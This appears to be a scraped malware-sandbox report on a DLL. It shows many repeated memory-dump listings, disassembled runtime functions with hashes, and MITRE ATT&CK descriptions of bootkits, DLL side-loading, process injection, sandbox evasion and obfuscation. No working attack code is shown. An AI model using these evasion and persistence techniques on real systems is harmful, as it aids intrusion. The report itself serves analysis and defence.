Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
String ID: $
API String ID: 2140441600-3993045852
Opcode ID: 21165786b8b8883df4376d99aa30738e270ab4acb6d54ac274b25c030584dba3
Instruction ID: 6174909d61d3ee472a4d699c8ba0826d3b09e7de408eb315b9f88606626d7c33
Opcode Fuzzy Hash: 21165786b8b8883df4376d99aa30738e270ab4acb6d54ac274b25c030584dba3
Instruction Fuzzy Hash: 8821F2B26087809FD710CF64C545B9BBBF4AB88B48F204A1DF4A187B91D7B9D548CB93

Function 6CEB19A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB19AE
std::exception::exception.LIBCMT ref: 6CEB19D0

Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C

Part of subcall function 6CEBE615: __CxxThrowException@8.LIBCMT ref: 6CEBE674

Strings

^l, xrefs: 6CEB19C9

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Copy_strException@8H_prologThrowstd::exception::_std::exception::exception
String ID: ^l
API String ID: 2887958872-2649338665
Opcode ID: 58e4301eec87e4d4aef2316c7af34a17c6b62fb5ad9822a376213c343e06d293
Instruction ID: b0e0c1f46d4ff5e851588e9f5cb44aa1e9a041db505b3ac16d536ab9e07e8e90
Opcode Fuzzy Hash: 58e4301eec87e4d4aef2316c7af34a17c6b62fb5ad9822a376213c343e06d293
Instruction Fuzzy Hash: 83F064B5C11209ABCB04CFA4D5427ECB7B8EB08318F20405EE820A7B10CB35A605CFA2

Function 6CEB44D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB44D8
std::bad_exception::bad_exception.LIBCMT ref: 6CEB44ED

Part of subcall function 6CECAC27: std::exception::exception.LIBCMT ref: 6CECAC31

Part of subcall function 6CEBEC65: __CxxThrowException@8.LIBCMT ref: 6CEBECBB

Strings

bad cast, xrefs: 6CEB44E5

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Exception@8H_prologThrowstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 3308202294-3145022300
Opcode ID: f19d5a6add88c63bfc4e486304a3a9c0b2fca9bab03100022b0765298627886e
Instruction ID: 90532898367348816e5fdac504d4f52e943ab012dcc6916943c3cb77f87acb0b
Opcode Fuzzy Hash: f19d5a6add88c63bfc4e486304a3a9c0b2fca9bab03100022b0765298627886e
Instruction Fuzzy Hash: EFF0A0769005089BC705CF94D441AEAF779EF46325F2145AEED099BB10CB72AA4ACBE0

Function 6CEB1CFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,6CEB118F,?,6CEDE69C,000000FF), ref: 6CEB1D05
GetLastError.KERNEL32(?,?,?,?,6CEB118F,?,6CEDE69C,000000FF), ref: 6CEB1D12

Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13

Strings

tss, xrefs: 6CEB1D20

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: 00a3edf02472045ad3f30620154ff3a4a7126025b237b7b1d07368c570594ad9
Instruction ID: 54bd5fb116e32a5e54370bab404052ae7e403e230ae10a72bd9253b58e4e8877
Opcode Fuzzy Hash: 00a3edf02472045ad3f30620154ff3a4a7126025b237b7b1d07368c570594ad9
Instruction Fuzzy Hash: CEE0CD71E011149B8B40ABF4D9094DEBB78DB052B5B200769FC11A3780FF709D0497D1

Function 6CEB448F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB4494
std::bad_exception::bad_exception.LIBCMT ref: 6CEB44A9

Part of subcall function 6CECAC27: std::exception::exception.LIBCMT ref: 6CECAC31

Part of subcall function 6CEBEC65: __CxxThrowException@8.LIBCMT ref: 6CEBECBB

Strings

bad cast, xrefs: 6CEB44A1

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Exception@8H_prologThrowstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 3308202294-3145022300
Opcode ID: 7607248fa7aef9d1a4c375a270dead30ea3e09cb26029e53eeef69f5df6a03e7
Instruction ID: 94fcbe8f8addc7ef11c4aade0c3e258a4dcce1b75f8f682c1f81b6d807e35524
Opcode Fuzzy Hash: 7607248fa7aef9d1a4c375a270dead30ea3e09cb26029e53eeef69f5df6a03e7
Instruction Fuzzy Hash: 33E09A719005489BC705CFA0C246BEDB7B4EB04308F2085ADA80697B90CB34AA5ACA91

Function 6CEBE8BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8

Strings

G7l, xrefs: 6CEBE8E4
G7l, xrefs: 6CEBE8CF

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: G7l$G7l
API String ID: 1452528299-901467417
Opcode ID: a3d396eba2968d91adc38ff45253fbb724321b6de019e6490b7b895d4d515779
Instruction ID: f0c93d727757836875eb9f3e72dee56ba6f1da392b740e38d95b6b6c1fed4e89
Opcode Fuzzy Hash: a3d396eba2968d91adc38ff45253fbb724321b6de019e6490b7b895d4d515779
Instruction Fuzzy Hash: 95E0ECB4504208AFC708DF94D944CAABBB8EB09210B008299FC099B311DB31E940CB90

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
